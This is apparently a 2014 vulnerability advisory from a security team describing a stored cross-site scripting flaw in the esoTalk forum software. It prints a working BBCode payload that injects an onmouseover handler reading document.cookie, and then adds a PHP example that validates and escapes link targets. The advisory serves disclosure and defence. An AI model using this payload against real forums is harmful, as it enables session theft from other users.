~# n0tr00t Security Team

esoTalk topic XSS vulnerability

01 Nov 2014 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2014-11-01

0x01 about

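esoTalk is a free, open-source web application from overseas, built on PHP and MySQL, with many strengths. Its design is extremely clean, and it is very fast, ultra-lightweight and highly extensible.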

0x02 payload

[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]

0x03 proof

0x04 fix

Issue: https://github.com/esotalk/esoTalk/issues/377

Waiting to update
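
The payload in 0x02 places an [img] tag inside the [url=...] argument, so one defensive approach is to accept only a plain http(s) URL as that argument and to escape it before it reaches the href attribute. The PHP below is an added example, not esoTalk's code and not the upstream fix; safe_link_target and render_url_tags are hypothetical names, and the http/https-only policy is an assumption.

```php
<?php
// Added example: hypothetical helpers, not esoTalk's own code.

// Return $arg only if it is a plain absolute http(s) URL; otherwise null.
function safe_link_target(string $arg): ?string
{
    // Brackets, quotes, angle brackets, whitespace and control characters
    // have no place in a link target and could carry markup into href="...".
    if ($arg === '' || preg_match('/[\[\]<>"\'\s\x00-\x1f]/', $arg)) {
        return null;
    }
    $parts = parse_url($arg);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    // Scheme allow-list (assumed policy: http and https only).
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $arg : null;
}

// Render [url=...]...[/url] in one pass over fully escaped input.
function render_url_tags(string $raw): string
{
    // Escape first, so every user-supplied character starts out inert.
    $escaped = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '~\[url=([^\]]*)\](.*?)\[/url\]~is',
        function (array $m): string {
            $url = safe_link_target(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($url === null) {
                return $m[0]; // invalid target: keep the tag as escaped text
            }
            // Re-escape for the attribute; $m[2] is already escaped text and
            // is not passed through any further tag replacement.
            $href = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
            return '<a href="' . $href . '" rel="nofollow noopener">' . $m[2] . '</a>';
        },
        $escaped
    ) ?? $escaped; // on a PCRE error, fall back to the escaped text
}

// Constructed inputs: the payload from section 0x02 and a benign link.
$samples = [
    '[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]',
    '[url=https://example.com/a?b=1&c=2]docs[/url]',
];
foreach ($samples as $s) {
    echo render_url_tags($s), PHP_EOL;
}
```

With these inputs the first sample comes back as inert escaped text, and only the second becomes an anchor.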